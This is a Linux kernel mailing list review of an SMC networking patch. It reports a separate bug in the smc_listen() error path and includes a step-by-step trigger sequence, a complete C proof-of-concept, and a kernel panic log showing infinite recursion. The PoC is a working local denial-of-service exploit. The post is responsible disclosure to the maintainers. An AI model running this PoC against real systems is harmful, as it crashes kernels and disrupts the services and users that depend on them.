Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU
Date: Tue Jun 23 2026 - 06:39:16 EST
Hi Runyu,
Thanks for this patch.
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
> {
> struct smc_sock *lsmc;
>
> + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> + return;
> +
> read_lock_bh(&listen_clcsock->sk_callback_lock);
> lsmc = smc_clcsock_user_data(listen_clcsock);
The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.
Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:
https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@xxxxxxxxxx
The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):
smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;
smc->af_ops = *smc->ori_af_ops;
smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;
inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;
if (smc->limit_smc_hs)
tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;
rc = kernel_listen(smc->clcsock, backlog);
if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
&smc->clcsk_data_ready);
rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
goto out;
}
The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock). I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.
=== Reproduction ===
Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2
Trigger sequence:
1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
→ clcsock gets SO_REUSEADDR via smc_bind() copy
2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
→ Both non-TCP_LISTEN at bind time → bind OK
→ C enters TCP_LISTEN after its listen()
3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
→ icsk_af_ops NOT restored → clcsock points to wrapper
4. Close TCP C (free port), listen(A) again → succeeds
→ ori_af_ops now points to wrapper with syn_recv_sock = smc_tcp_syn_recv_sock
5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
→ infinite recursion → IRQ stack guard page hit → kernel panic
=== Full PoC ===
Compile with: gcc -o poc poc.c -static
// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif
int main(void)
{
int smc_a, tcp_c, client;
struct sockaddr_in addr;
pid_t child;
int status, ret;
socklen_t len;
int val;
printf("=== SMC listen error path -> stack overflow PoC ===\n\n");
/* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
printf("[1] Create SMC socket A with SO_REUSEADDR\n");
smc_a = socket(PF_SMC, SOCK_STREAM, 0);
if (smc_a < 0) { perror("smc socket"); return 1; }
val = 1;
setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = 0;
if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind smc_a"); close(smc_a); return 1;
}
len = sizeof(addr);
if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
perror("getsockname"); close(smc_a); return 1;
}
int port = ntohs(addr.sin_port);
printf(" SMC A bound to port %d\n", port);
/* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
tcp_c = socket(AF_INET, SOCK_STREAM, 0);
val = 1;
setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(port);
if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
}
if (listen(tcp_c, 5) < 0) {
perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
}
printf(" TCP C listening on port %d\n", port);
/* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
printf("[3] listen(SMC A) — expect failure... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret == 0) {
printf("succeeded! Unexpected.\n");
close(tcp_c); close(smc_a);
return 1;
}
printf("failed: %s\n", strerror(errno));
/* Step 4: Close TCP C to free the port */
printf("[4] Close TCP C to free port %d\n", port);
close(tcp_c);
sleep(1);
/* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
printf("[5] listen(SMC A) again... ");
fflush(stdout);
ret = listen(smc_a, 5);
if (ret < 0) {
printf("failed: %s, retrying...\n", strerror(errno));
sleep(2);
ret = listen(smc_a, 5);
}
if (ret < 0) {
perror("retry"); close(smc_a); return 1;
}
printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");
/* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
printf("[6] TCP connect → triggers infinite recursion...\n");
fflush(stdout);
child = fork();
if (child == 0) {
client = socket(AF_INET, SOCK_STREAM, 0);
if (client < 0) exit(1);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_port = htons(port);
if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
perror("connect");
exit(1);
}
sleep(3);
close(client);
exit(0);
}
printf("Waiting for crash...\n");
sleep(5);
if (waitpid(child, &status, WNOHANG) == 0) {
printf("Child still alive — check dmesg\n");
kill(child, SIGKILL);
waitpid(child, NULL, 0);
}
close(smc_a);
return 0;
}
=== Crash Log ===
Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)
[ 1453.562682][ C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][ C0] Call Trace:
[ 1453.562970][ C0] <IRQ>
[ 1453.562980][ C0] lock_acquire+0x1ae/0x360
[ 1453.562995][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][ C0] smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][ C0] ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[... 15+ recursive frames ...]
[ 1453.564373][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][ C0] RIP: 0033:0x423574
[ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in interrupt
The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.
Thanks,
Xiao